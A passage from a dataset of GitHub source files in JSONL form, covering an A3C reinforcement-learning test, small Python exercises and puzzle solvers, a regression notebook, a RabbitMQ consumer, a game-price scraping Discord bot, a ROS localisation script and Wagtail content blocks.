weight_scale(nn.Linear(hidden_size, n_actions), 1e-1),\n SoftmaxCategoricalHead(),\n )\n else:\n action_size = env.action_space.low.size\n pi = RecurrentSequential(\n nn.LSTM(num_layers=1, input_size=obs_size, hidden_size=hidden_size),\n weight_scale(nn.Linear(hidden_size, action_size), 1e-1),\n GaussianHeadWithStateIndependentCovariance(\n action_size=action_size,\n var_type=\"diagonal\",\n var_func=lambda x: torch.exp(2 * x),\n var_param_init=0,\n ),\n )\n return RecurrentBranched(pi, v)\n else:\n v = nn.Sequential(\n nn.Linear(obs_size, hidden_size),\n nn.Tanh(),\n weight_scale(nn.Linear(hidden_size, 1), 1e-1),\n )\n if self.discrete:\n n_actions = env.action_space.n\n pi = nn.Sequential(\n nn.Linear(obs_size, hidden_size),\n nn.Tanh(),\n weight_scale(nn.Linear(hidden_size, n_actions), 1e-1),\n SoftmaxCategoricalHead(),\n )\n else:\n action_size = env.action_space.low.size\n pi = nn.Sequential(\n nn.Linear(obs_size, hidden_size),\n nn.Tanh(),\n weight_scale(nn.Linear(hidden_size, action_size), 1e-1),\n GaussianHeadWithStateIndependentCovariance(\n action_size=action_size,\n var_type=\"diagonal\",\n var_func=lambda x: torch.exp(2 * x),\n var_param_init=0,\n ),\n )\n return pfrl.nn.Branched(pi, v)\n\n def _test_abc(\n self,\n t_max,\n recurrent,\n discrete=True,\n episodic=True,\n steps=100000,\n require_success=True,\n ):\n nproc = 8\n\n def make_env(process_idx, test):\n size = 2\n return ABC(\n size=size,\n discrete=discrete,\n episodic=episodic or test,\n partially_observable=self.recurrent,\n deterministic=test,\n )\n\n env = make_env(0, False)\n\n model = self.make_model(env)\n\n from pfrl.optimizers import SharedRMSpropEpsInsideSqrt\n\n opt = SharedRMSpropEpsInsideSqrt(model.parameters())\n gamma = 0.8\n beta = 1e-2\n agent = a3c.A3C(\n model,\n opt,\n t_max=t_max,\n gamma=gamma,\n beta=beta,\n act_deterministically=True,\n max_grad_norm=1.0,\n recurrent=recurrent,\n )\n\n max_episode_len = None if episodic else 2\n\n with warnings.catch_warnings(record=True) as warns:\n train_agent_async(\n outdir=self.outdir,\n processes=nproc,\n make_env=make_env,\n agent=agent,\n steps=steps,\n max_episode_len=max_episode_len,\n eval_interval=500,\n eval_n_steps=None,\n eval_n_episodes=5,\n successful_score=1,\n )\n assert len(warns) == 0, warns[0]\n\n # The agent returned by train_agent_async is not guaranteed to be\n # successful because parameters could be modified by other processes\n # after success. Thus here the successful model is loaded explicitly.\n if require_success:\n agent.load(os.path.join(self.outdir, \"successful\"))\n\n # Test\n env = make_env(0, True)\n n_test_runs = 5\n eval_returns, _ = run_evaluation_episodes(\n env,\n agent,\n n_steps=None,\n n_episodes=n_test_runs,\n max_episode_len=max_episode_len,\n )\n successful_return = 1\n if require_success:\n n_succeeded = np.sum(np.asarray(eval_returns) >= successful_return)\n assert n_succeeded == n_test_runs\n\n\n@pytest.mark.parametrize(\"t_max\", [1, 2])\n@pytest.mark.parametrize(\"recurrent\", [False])\n@pytest.mark.parametrize(\"discrete\", [True, False])\n@pytest.mark.parametrize(\"episodic\", [True, False])\nclass TestA3CSmallTMax(_TestA3C):\n @pytest.fixture(autouse=True)\n def set_params(self, t_max, recurrent, discrete, episodic):\n self.t_max = t_max\n self.recurrent = recurrent\n self.discrete = discrete\n self.episodic = episodic\n\n\n@pytest.mark.parametrize(\"t_max\", [5])\n@pytest.mark.parametrize(\"recurrent\", [True, False])\n@pytest.mark.parametrize(\"discrete\", [True, False])\n@pytest.mark.parametrize(\"episodic\", [True, False])\nclass TestA3CLargeTMax(_TestA3C):\n @pytest.fixture(autouse=True)\n def set_params(self, t_max, recurrent, discrete, episodic):\n self.t_max = t_max\n self.recurrent = recurrent\n self.discrete = discrete\n self.episodic = episodic\n","repo_name":"pfnet/pfrl","sub_path":"tests/agents_tests/test_a3c.py","file_name":"test_a3c.py","file_ext":"py","file_size_in_byte":6994,"program_lang":"python","lang":"en","doc_type":"code","stars":1097,"dataset":"github-code","pt":"85"} +{"seq_id":"2596831470","text":"# Programm zur Eingabe einiger persönlicher Daten und Ausrechnung des Alters\n\n# Eingaben\nvorname = input(\"Geben Sie Ihren Vornamen ein: \")\nnachname = input(\"Geben Sie Ihren Nachnamen ein: \")\ngebOrt = input(\"Wo sind Sie geboren? \")\ngebJahr = input(\"In welchem Jahr wurden Sie geboren? \")\n\n# Ausgabe der Daten\nprint(\"Name:\", vorname, nachname)\nprint(\"Geburtsort:\", gebOrt)\nprint(\"Geburtsjahr:\", gebJahr)\n\n# ab hier: neuer Teil\ngebJahr = int(gebJahr) # Zeichenkette (str) in Ganzzahl (int) umwandeln \nalter = 2016 - gebJahr # Alter berechnen\nprint(\"Alter:\", alter) # Alter ausgeben\n","repo_name":"Informatik-AG-KGN-2016/Dokumente","sub_path":"2016-11-14/hausaufgabe-loesung.py","file_name":"hausaufgabe-loesung.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"10472449290","text":"from random import randint\nfrom itertools import permutations\nfrom typing import List\nfrom math import sqrt\nimport time\n\noperand = ['+', '-', '*', '/']\nstartTime = time.time()\nresult = 0\n\n\ndef get_all_possible_val(p_numlist: List) -> List[tuple]:\n \"\"\"\n get all possible value from 4 number and 4 operand with priority order (1, 2, 3, 4) not like (1, 3, 2, 4)\n\n Args:\n p_numlist (List): list of 4 number\n\n Returns:\n List: list of all posiblevalue and string for represent value\n \"\"\"\n all_possiblepos_val = dict()\n for nums in p_numlist:\n a, b, c, d = nums\n L1 = pos_val((a, str(a)), (b, str(b)))\n L2 = pos_val((c, str(c)), (d, str(d)))\n for x1, str_x1 in L1:\n for x2, str_x2 in L2:\n possible = pos_val((x1, str_x1), (x2, str_x2))\n val, equ = findClosestValue(possible, result)\n if val not in all_possiblepos_val:\n all_possiblepos_val[val] = equ\n elif len(equ) < len(all_possiblepos_val[val]):\n all_possiblepos_val[val] = equ\n if val == result and len(equ) <= 15 and \"√\" not in equ:\n print(\"found way after: \" +\n str(len(all_possiblepos_val)) + \" ways\")\n return [(val, equ)]\n\n print(\"all possible way: \" + str(len(all_possiblepos_val)) + \" ways\")\n return list(all_possiblepos_val.items())\n\n\ndef pos_val(num1: tuple(), num2: tuple()) -> List[tuple]:\n \"\"\"\n get all possible value from two number\n\n Args:\n num1 (tuple(float, string)): value of num1 and string for represent num1\n num2 (tuple(float, string)): value of num2 and string for represent num2\n\n Returns:\n list[tuple(float, string)]: all possible value and string for represent value\n \"\"\"\n pos_value = []\n\n num1, str1 = num1\n num2, str2 = num2\n pos_value += pos_val_basic((num1, str1), (num2, str2))\n pos_value += pos_val_basic((-num1, f'-{str1}'), (num2, str2))\n\n temp1 = sqrt(abs(num1))\n temp2 = sqrt(abs(num2))\n\n pos_value += pos_val_basic((temp1,\n f'root|{str1}|'), ((temp2, f'root|{str2}|')))\n pos_value += pos_val_basic((-temp1,\n f'-root|{str1}|'), ((temp2, f'root|{str2}|')))\n\n pos_value += pos_val_basic((temp1,\n f'root|{str1}|'), ((num2, str2)))\n pos_value += pos_val_basic((-temp1,\n f'-root|{str1}|'), ((num2, str2)))\n\n pos_value += pos_val_basic((num1, str1),\n ((temp2, f'root|{str2}|')))\n pos_value += pos_val_basic((-num1,\n f'-{str1}'), (temp2, f'root|{str2}|'))\n\n dic = dict()\n perfect_equ = list(filter(lambda x: x[0] == result, pos_value))\n if len(perfect_equ) == 0:\n for val, string in pos_value:\n if abs(val - result) < 20:\n if val not in dic:\n dic[val] = string\n elif len(string) < len(dic[val]):\n dic[val] = string\n\n pos_value = list(dic.items())\n return pos_value\n else:\n ansEqu = perfect_equ[0][1]\n for _, equ in perfect_equ:\n if len(equ) < len(ansEqu):\n ansEqu = equ\n if len(ansEqu) <= 20:\n return [(result, ansEqu)]\n return [(result, ansEqu)]\n\n\ndef pos_val_basic(num1: tuple(), num2: tuple()) -> List[tuple]:\n \"\"\"\n get all possible value from two number with basic operand (+, -, *, /)\n\n Args:\n num1 (tuple(float, string)): value of num1 and string for represent num1\n num2 (tuple(float, string)): value of num2 and string for represent num2\n\n Returns:\n list[tuple(float, string)]: all possible value and string for represent value\n \"\"\"\n pos_value = []\n num1, str1 = num1\n num2, str2 = num2\n for oper in operand:\n if oper == '/' and num2 == 0:\n continue\n # value = eval(f'{num1}{oper}{num2}')\n if oper == '+':\n value = num1 + num2\n if oper == '-':\n value = num1 - num2\n if oper == '*':\n value = num1 * num2\n if oper == '/':\n value = num1 / num2\n\n pos_value.append((value, f'({str1}{oper}{str2})'))\n return pos_value\n\n\ndef findClosestValue(all_possible_val: List, target: int) -> tuple:\n \"\"\"\n find closest value from all possible value\n\n Args:\n all_possible_val (List): list of all possible value\n target (int): target value\n\n Returns:\n tuple: closest value and string for represent value\n\n \"\"\"\n maxx = 1e9\n ansVal = 0\n ansEqu = ''\n for val, equ in all_possible_val:\n if abs(val - target) < maxx:\n maxx = abs(val - target)\n ansVal = val\n ansEqu = equ\n ansEqu = ansEqu.replace('-+', '-').replace('--', '+')\\\n .replace('+-', '-').replace('|(', '|').replace(')|', '|').replace('root', '√')\n return (ansVal, ansEqu)\n\n\ndef removeParenthesis(equ: str) -> tuple:\n \"\"\"\n Remove unnecessary parenthesis\n\n Args:\n equ (str): equation\n\n Returns:\n tuple: value and equation\n \"\"\"\n val, equ = equ\n parenthesis = []\n remove = True\n for i in range(len(equ)):\n if len(parenthesis) != 0:\n if parenthesis[0] != 0:\n remove = False\n break\n if equ[i] == '(':\n parenthesis.append(i)\n elif equ[i] == ')':\n parenthesis.pop(-1)\n if remove:\n equ = equ[1:-1]\n return (val, equ)\n\n\ndef main():\n global result\n numlist = [randint(0, 9) for _ in range(4)]\n while(numlist.count(0) >= 2):\n numlist = [randint(0, 9) for _ in range(4)]\n result = randint(0, 2400)//100\n\n p_numlist = list(permutations(numlist))\n prototype = f'{numlist[0]} {numlist[1]} {numlist[2]} {numlist[3]} = {result}'\n print(prototype)\n\n all_possible = get_all_possible_val(p_numlist)\n best_way = findClosestValue(all_possible, result)\n best_way = removeParenthesis(best_way)\n val, equ = best_way\n\n print(f'best way: {equ} = {val}')\n print(f'cost time: {time.time()-startTime:.2f}s')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"JiMeow/4num_toresult_sol","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6279,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"70232579799","text":"\"\"\"\n Solution to the - https://open.kattis.com/problems/downtime\n\n The approach to the solution is to maintain an in-progress double-ended queue to hold the current requests.\n As the minimum number of servers needed can only be exceeded when the new requests are coming in we do the next:\n 1. When the new request comes in we add it to the end of the deque\n 2. Then we drop all requests processed already after the previous request came in from the begining of the deque\n 3. Then we see how many requests are in progress and how many servers needed to serve them\n 4. If that number of servers is larger than what we've seen before, we update the new minimum\n 5. Once all the requests are processed, the largest observed minimum is returned as the result\n\"\"\"\n__author__ = \"Taras Basiuk\"\n\nfrom collections import deque\n\nif __name__ == \"__main__\":\n n, k = tuple(map(int, input().strip().split())) # Read in N and K\n\n min_serv = 0 # Minimum number of servers needed to handle the workload\n in_progress = deque([]) # Double-ended queue(deque) holding all the timestamps of the requests currently in progress\n\n for _ in range(n): # For each of N timestamps\n ct = int(input().strip()) # Read in the next timestamp\n\n in_progress.append(ct) # Add the timestamp of the current request to the end of the in_progress deque\n\n # Now remove all the jobs from the beginning of the in_progress deque which must've been processed by now\n while in_progress[0] <= ct - 1000:\n in_progress.popleft()\n\n cip = len(in_progress) # Record how many jobs are actually currently in progress(cip)\n cur_serv = (cip // k) + (1 if cip % k > 0 else 0) # Calculate how many servers are processing current requests\n\n # Update the minimum number of servers needed to handle the workload, if appropriate\n min_serv = cur_serv if cur_serv > min_serv else min_serv\n\n print(min_serv) # Output the result\n","repo_name":"BasiukTV/coding-problems","sub_path":"kattis/downtime/taras_basiuk.py","file_name":"taras_basiuk.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"3660903919","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # GRIP - THE SPARK FOUNDATION\n# \n# ### DATA SCIENCE & BUSINESS ANALYTICS INTERNSHIP\n# \n# ## NIRMAL JOY\n\n# ## TASK 1 - : PREDICTION USING SUPERVISED ML\n\n# \n# ### PREDICT THE PERCENTAGE OF AN STUDENT BASED ON THE NO. OF STUDY HOURS\n# \n\n# ### 1. IMPORT REQUIRED LIBRARIES\n\n# In[1]:\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import metrics\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\n\n\n# ### 2. IMPORTING DATASET\n\n# In[2]:\n\n\nScore = pd.read_csv(r'C:\\Users\\vpare\\OneDrive\\Desktop\\Virtual internship\\GRIP\\TS1\\Score.csv')\nprint(\"Dataset imported...\")\n\n\n# In[3]:\n\n\nScore.head()\n\n\n# ## 3. DATA VISUALIZATION\n\n# ### 3.1 PLOTTING THE DISTRIBUTION HOURS AND SCORES ON SCATTER PLOTS\n\n# In[4]:\n\n\nplt.scatter(x=\"Hours\",y=\"Scores\",data=Score)\nplt.title(\"Hours vs Percentage\")\nplt.xlabel(\"Hours Studied\")\nplt.ylabel(\"Percentage Score\")\n\n\n# ### 3.2 UNIVARIATE VISUALIZATION\n\n# In[5]:\n\n\nScore.hist(grid=False,figsize=(8,3))\nplt.show()\n\n\n# ## 4. DATA PREPERATION\n\n# In[6]:\n\n\nx =Score.drop(columns=[\"Scores\"])\ny = Score[\"Scores\"]\n\n\n# In[7]:\n\n\nx_train, x_test, y_train, y_test = train_test_split(x,y,test_size=0.2, random_state=0)\nprint(f\"--> training data points {x_train.shape[0]} and testing data points {x_test.shape[0]}\")\n\n\n# ## 5. TRAINING THE ALGORITHM\n\n# In[8]:\n\n\nregressor = LinearRegression()\nregressor.fit(x_train,y_train)\nprint(\"training is Completed \")\n\n\n# ### 5.1 PLOTTING REGRESSION LINE\n\n# In[9]:\n\n\nprint(f\"--> Equation of line y = {np.round(regressor.coef_[0],2)}*x+{np.round(regressor.intercept_,2)}\")\n\n\n# In[10]:\n\n\nplt.scatter(x_train,y_train)\nplt.xlabel(\"Hours\")\nplt.ylabel(\"Scores\")\nplt.plot(x_train,regressor.predict(x_train),\"m\")\nplt.show()\n\n\n# ## 6. MAKING PREDICTIONS ON TESTING DATA\n\n# In[11]:\n\n\nprint(x_test) #testing data\n\n\n# In[12]:\n\n\ny_pred = regressor.predict(x_test)\n\n\n# In[13]:\n\n\nprint(\"Comparing actual data and predicted data\")\ndf = pd.DataFrame({\"Actual\":y_test, \"Predicted\": y_pred})\ndf\n\n\n# ### 6.1 PLOTTING LINE ON TESTING DATA\n\n# In[14]:\n\n\nplt.scatter(x_test,y_test)\nplt.xlabel(\"Hours\")\nplt.ylabel(\"Scores\")\nplt.plot(x_test,regressor.predict(x_test),\"g\")\nplt.show()\n\n\n# ## 7. TESTING AND FINDING PREDICTION FOR 9.25 HOURS STUDY/DAY\n\n# In[15]:\n\n\nhours = 9.25\nown_pred = regressor.predict([[hours]])\nprint(f\"No of Hours = {hours}\")\nprint(f\"predicted Score = {own_pred[0]}\")\n\n\n# ## 8. EVALUATING MODEL\n\n# In[16]:\n\n\nprint(\"Mean Absolute Error:\",metrics.mean_absolute_error(y_test,y_pred))\nprint(\"Mean squared Error:\",metrics.mean_squared_error(y_test,y_pred))\nprint(\"r2 Score:\",metrics.r2_score(y_test,y_pred))\n\n\n# # Thank you ❤❤\n","repo_name":"Nirmaljoey/TSF-GRIP","sub_path":"Prediction using supervised machine learning.py","file_name":"Prediction using supervised machine learning.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"15602147404","text":"# -*- coding: utf8 -*-\n\nfrom typing import Union\nfrom linked_list import ListNode\n\n\ndef get_linked_list_length(head: ListNode) -> int:\n length = 0\n while head is not None:\n length += 1\n head = head.next\n return length\n\n\ndef get_intersect_node(headA: ListNode, headB: ListNode) -> Union[ListNode, None]:\n lenA = get_linked_list_length(headA)\n lenB = get_linked_list_length(headB)\n if lenA >= lenB:\n for _ in range(lenA - lenB):\n headA = headA.next\n else:\n for _ in range(lenB - lenA):\n headB = headB.next\n while headA is not None:\n if headA == headB:\n return headA\n headA = headA.next\n headB = headB.next\n return None\n\n\ndef get_intersect_node2(headA: ListNode, headB: ListNode) -> Union[ListNode, None]:\n \"\"\"\n 走的快的一定会追上走的慢的\n 一个链表走完就去走另一条列表\n :param headA:\n :param headB:\n :return:\n \"\"\"\n cur_a, cur_b = headA, headB\n while cur_a != cur_b:\n cur_a = cur_a.next if cur_a else headB\n cur_b = cur_b.next if cur_b else headA\n return cur_a\n","repo_name":"Sisyphus235/daily_tech","sub_path":"Algorithms/linked_list/leetcode02_07/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"8312664349","text":"import asyncio\n\nfrom aio_pika.abc import AbstractIncomingMessage\n\nfrom adapters.rabbit import RMQ\nfrom core.config import settings\nfrom core.logger import logger\nfrom worker import request_async_api\n\n\nasync def main():\n rabbit = RMQ()\n\n await rabbit.connect(settings.get_amqp_uri(), queue_name=\"voice_service\")\n await rabbit.queue.bind(rabbit.exchange, routing_key=\"events.files\")\n\n async with rabbit.queue.iterator() as iterator:\n message: AbstractIncomingMessage\n async for message in iterator:\n async with message.process(ignore_processed=True):\n logger.info(\"Получено новое сообщение в очереди\")\n # request_async_api(message)\n request_async_api.delay(message.body)\n await message.ack()\n\n\nif __name__ == \"__main__\":\n logger.info(\"Сервис запустился\")\n asyncio.run(main())\n","repo_name":"uspanych/voice_assistant","sub_path":"voice_service/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"41413297272","text":"import urllib, os, re, requests, discord, wikipedia\nfrom bs4 import BeautifulSoup\nfrom tools import updateCounter, searchResultsTest\nfrom currency_converter import CurrencyConverter\n\n# Searches youtube, taking a query and a result number as parameters\n# and returning a url\n\nasync def search(query, n, prefix=None):\n queryString = urllib.parse.quote_plus(query)\n queryString = queryString.replace(\"%20\", \"+\")\n url = 'https://www.pricecharting.com/search-products?q=\"' + queryString + '\"&type=prices'\n page = requests.get(url)\n soup = BeautifulSoup(page.text, features='html.parser')\n if soup.find(id=\"games_table\"):\n values = scrapeFromSearch(soup.find(id=\"games_table\"))\n else:\n values = scrapeFromPage(soup, page.url)\n if searchResultsTest(values, n) != 0:\n return searchResultsTest(values, n)\n return values[n]\n\ndef scrapeFromSearch(soup):\n values = []\n lastName = \"\"\n for rows in soup.findAll('tr'):\n temp = {}\n for cols in rows.findAll('td'):\n classList = cols.get('class')\n if cols.find('a'):\n if cols.find('a').find('span'):\n temp[classList[len(classList) - 1]] = cols.find('a').find('span').string.strip()\n else: \n temp[classList[len(classList) - 1]] = cols.find('a').string.strip()\n temp['link'] = cols.find('a')['href']\n elif cols.find('span'):\n temp[classList[len(classList) - 1]] = cols.find('span').string\n else:\n temp[classList[len(classList) - 1]] = cols.string.strip()\n if len(temp) < 1:\n continue\n if temp['title'] != lastName:\n values.append({temp['title']:[]})\n lastName = temp['title']\n del temp['title']\n del temp['add_to']\n values[len(values)-1][lastName].append(temp)\n else:\n del temp['title']\n del temp['add_to']\n values[len(values)-1][lastName].append(temp)\n return values\n\n\ndef scrapeFromPage(soup, url):\n try:\n temp = soup.find(id=\"product_name\").getText().split(\"\\n\")\n except:\n return -1\n names = []\n for i in range(len(temp) - 1):\n if temp[i].isspace() == True or not temp[i] or temp[i] == '':\n continue\n names.append(temp[i].strip())\n try:\n used = soup.find(id=\"used_price\").find(\"span\").getText().strip()\n cib = soup.find(id=\"complete_price\").find(\"span\").getText().strip()\n new = soup.find(id=\"new_price\").find(\"span\").getText().strip()\n except:\n return -1\n value = [{names[0]:[{'console':names[1],\n 'used_price':used,\n 'cib_price':cib,\n 'new_price':new,\n 'link':url\n }]}]\n return value\n\ndef getImageUrl(url):\n page = requests.get(url)\n soup = BeautifulSoup(page.text, features='html.parser')\n for links in soup.findAll(\"div\", {\"class\": \"cover\"}):\n link = links.find('img')['src']\n if not urllib.parse.urlparse(link).netloc:\n link = \"https://www.pricecharting.com\" + link\n return link\n\ndef getFormattedRow(value):\n string = \"Loose: \"\n if value['used_price'] in [\"\", None, \"N/A\"]:\n string = string + \"Unknown or N/A\\nCIB: \"\n else:\n string = string + parseDollar(value['used_price']) + \"\\nCIB: \"\n if value['cib_price'] in [\"\", None, \"N/A\"]:\n string = string + \"Unknown or N/A\\nNew: \"\n else:\n string = string + parseDollar(value['cib_price']) + \"\\nNew: \"\n if value['new_price'] in [\"\", None, \"N/A\"]:\n string = string + \"Unknown or N/A\"\n else:\n string = string + parseDollar(value['new_price'])\n return string\n \ndef parseDollar(dollar):\n return \"£\" + str(\"%.2f\" % round(CurrencyConverter() .convert(dollar[1:], 'USD', 'GBP'), 2))\n\nasync def getEmbed(results, colour):\n if results == -1:\n return None\n for key, values in results.items():\n wiki = getWiki(key + \" \" + values[0]['console'])\n e = discord.Embed(title=key, url=wiki, colour=colour)\n for value in values:\n cover = getImageUrl(value['link'])\n e.set_thumbnail(url=cover)\n e.add_field(\n name = value['console'],\n value = getFormattedRow(value),\n inline=False\n )\n return e\n\ndef getWiki(query):\n search = wikipedia.search(query, results=10)\n if len(search) == 0:\n return None\n for i in range(len(search) - 1):\n try:\n categories = wikipedia.page(str(search[i]), auto_suggest=0).categories\n url = wikipedia.page(str(search[i]), auto_suggest=0).url\n except:\n continue\n else:\n for j in range(len(categories) - 1):\n if \"video games\" in categories[j].lower():\n return url\n return None\n","repo_name":"vertigo65536/genei-jin","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"2042341674","text":"import sys\nfrom geometry_msgs.msg import Twist\nimport rospy\nimport operator\nfrom take_photo import TakePhoto\nimport cv2 as cv\nfrom find_match import FindMatch\nimport pickle\nimport time\n\ncamera = TakePhoto()\ntwist = Twist()\nfind = FindMatch()\n\nquery_descriptors = []\nquery_keypoints = []\ngood_matches = []\ndescriptors_dataset = []\ndataset_names = []\nminHessian = 400\n\n\ndef move():\n\n # read dataset descriptors and locations\n with open('dataset2/dataset2_descriptors.txt', 'rb') as fp:\n descriptors_dataset = pickle.load(fp)\n with open('dataset2/dataset2_names.txt', 'rb') as fp:\n dataset_names = pickle.load(fp)\n\n pub = rospy.Publisher('cmd_vel_mux/input/navi', Twist, queue_size=10)\n rospy.init_node('teleop_py',anonymous=True)\n rate = rospy.Rate(1)\n\n while not rospy.is_shutdown():\n good_matches = []\n query_descriptors = []\n query_keypoints = []\n\n #twist.angular.z = 0.5\n #pub.publish(twist)\n index = 0\n img_title ='query_robot/queryImg.jpg'\n camera.take_picture(img_title)\n\n queryImg = cv.imread(img_title, cv.IMREAD_GRAYSCALE)\n if queryImg is None:\n print('Could not open or find the query image!')\n exit(0)\n\n # print(queryImg)\n # call functions for feature extraction\n find.getQueryDescriptor(query_descriptors, query_keypoints, queryImg)\n # print(query_descriptors)\n # print(len(descriptors_dataset))\n find.match(good_matches, descriptors_dataset, query_descriptors)\n # print(len(good_matches))\n\n # find max number of matches - assume best match\n index, value = max(enumerate(good_matches), key=operator.itemgetter(1))\n best_match = dataset_names[index]\n print('i am in ' + best_match)\n rate.sleep()\n\n # t0 = time.time()\n # # computation time\n # t1 = time.time()\n # time_taken = t1-t0\n # print('computation time: ' + str(time_taken) + 's')\n\n\nif __name__ == '__main__':\n try:\n # getReady(dataset_names, descriptors_dataset)\n\n move()\n except rospy.ROSInterruptException:\n pass\n\n# move()\n","repo_name":"akollaki/cv_localisation","sub_path":"scripts_v1/move.py","file_name":"move.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"73529533717","text":"from wagtail import VERSION as WAGTAIL_VERSION\nfrom wagtail.contrib.table_block.blocks import TableBlock\n\nif WAGTAIL_VERSION >= (3, 0):\n from wagtail.blocks import (\n ChoiceBlock,\n RichTextBlock,\n TextBlock,\n StructBlock,\n StreamBlock,\n )\n from wagtail.documents.blocks import DocumentChooserBlock\n from wagtail.embeds.blocks import EmbedBlock\n from wagtail.images.blocks import ImageChooserBlock\nelse:\n from wagtail.core.blocks import (\n ChoiceBlock,\n RichTextBlock,\n TextBlock,\n StructBlock,\n StreamBlock,\n )\n from wagtail.documents.blocks import DocumentChooserBlock\n from wagtail.embeds.blocks import EmbedBlock\n from wagtail.images.blocks import ImageChooserBlock\n\nfrom wagtailcodeblock.blocks import CodeBlock\n\n\nclass CaptionedImageBlock(StructBlock):\n \"\"\"\n An image block with a caption, credit, and alignment.\n \"\"\"\n\n image = ImageChooserBlock(\n help_text=\"The image to display.\",\n )\n caption = TextBlock(\n required=False, help_text=\"The caption will appear under the image, if entered.\"\n )\n credit = TextBlock(\n required=False, help_text=\"The credit will appear under the image, if entered.\"\n )\n align = ChoiceBlock(\n choices=[\n (\"left\", \"Left\"),\n (\"right\", \"Right\"),\n (\"center\", \"Center\"),\n (\"full\", \"Full Width\"),\n ],\n default=\"left\",\n help_text=\"How to align the image in the body of the page.\",\n )\n\n class Meta:\n icon = \"image\"\n template = \"wagtailcontentstream/blocks/captioned_image.html\"\n help_text = \"Select an image and add a caption (optional).\"\n\n\nclass ContentStreamBlock(StreamBlock):\n \"\"\"\n Contains the elements we'll want to have in a Content Stream.\n \"\"\"\n\n heading = TextBlock(\n icon=\"title\",\n template=\"wagtailcontentstream/blocks/heading.html\",\n )\n paragraph = RichTextBlock(\n icon=\"pilcrow\",\n features=[\"bold\", \"italic\", \"link\", \"ol\", \"ul\", \"monospace\"],\n )\n image = CaptionedImageBlock()\n document = DocumentChooserBlock()\n embed = EmbedBlock(icon=\"media\")\n table = TableBlock(icon=\"table\")\n code = CodeBlock(icon=\"code\")\n\n class Meta:\n help_text = \"The main page body.\"\n\n\nclass ContentStreamBlockWithRawCode(ContentStreamBlock):\n raw_code = CodeBlock(\n icon=\"code\",\n language=\"html\",\n template=\"wagtailcodeblock/raw_code.html\",\n )\n\n\nclass SectionStructBlock(StructBlock):\n \"\"\"\n Contains the elements we'll want to have in a Sectioned Content Stream block.\n \"\"\"\n\n section_heading = TextBlock(\n icon=\"title\",\n help_text=\"Heading for this section.\",\n )\n body = ContentStreamBlock(\n help_text=\"The body content goes here.\",\n )\n\n class Meta:\n template = \"wagtailcontentstream/blocks/section_struct_block.html\"\n icon = \"doc-full-inverse\"\n\n\nclass SectionBlock(StreamBlock):\n \"\"\"\n Streamblock to associate multiple blocks with a section.\n \"\"\"\n\n section = SectionStructBlock()\n\n class Meta:\n help_text = \"The main page body.\"\n","repo_name":"FlipperPA/wagtailcontentstream","sub_path":"wagtailcontentstream/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"85"} +{"seq_id":"27784802490","text":"# -*- coding: utf-8 -*-\nimport os\nimport click\nimport logging\nfrom dotenv import find_dotenv, load_dotenv\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.base import TransformerMixin, BaseEstimator\nfrom sklearn.preprocessing import StandardScaler\n\nfrom ds_mega.data.extractors import *\n\n\"\"\"\n\"\"\"\n\n\n@click.command()\n@click.argument('input_filepath', type=click.Path(exists=True))\n@click.argument('output_filepath', type=click.Path())\ndef main(input_filepath, output_filepath):\n \"\"\" Runs data processing scripts to turn raw data from (../raw) into\n cleaned data ready to be analyzed (saved in ../processed).\n \"\"\"\n logger = logging.getLogger(__name__)\n logger.info('making final data set from raw data')\n\n pipeline_yb = Pipeline([\n ('year_built', YearBuiltExtractor())\n ])\n\n # df = pd.read_csv('../data/raw/tmp_ds_cluster.csv.gz', dtype=dtype)\n df = pd.read_csv(input_filepath)\n df_out = pd.read_csv(input_filepath)\n\n X = pipeline_yb.fit_transform(df)\n\n df_out.to_csv(output_filepath, index=False)\n\n\n\nif __name__ == '__main__':\n log_fmt = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n logging.basicConfig(level=logging.INFO, format=log_fmt)\n\n # not used in this stub but often useful for finding various files\n project_dir = os.path.join(os.path.dirname(__file__), os.pardir, os.pardir)\n\n # find .env automagically by walking up directories until it's found, then\n # load up the .env entries as environment variables\n load_dotenv(find_dotenv())\n\n main()\n","repo_name":"franc3000/ds_mega","sub_path":"ds_mega/data/make_dataset.py","file_name":"make_dataset.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"21544677581","text":"from collections import defaultdict, deque\nimport re\n\nwith open('07.txt', 'r') as file:\n data = file.read()\n\n\ndef parse_input(data):\n bags = re.findall(r'([a-z]+ [a-z]+) bags contain (.+)', data)\n pattern = re.compile(r'(\\d+) ([a-z]+ [a-z]+) bag')\n graph = {bag: {nested_bag: int(v) for v, nested_bag in pattern.findall(nested_bags)} for bag, nested_bags in bags}\n return graph\n\n\ndef create_reverse_graph(graph):\n rev = defaultdict(list)\n for k, v in graph.items():\n for new_key in v.keys():\n rev[new_key].append(k)\n return 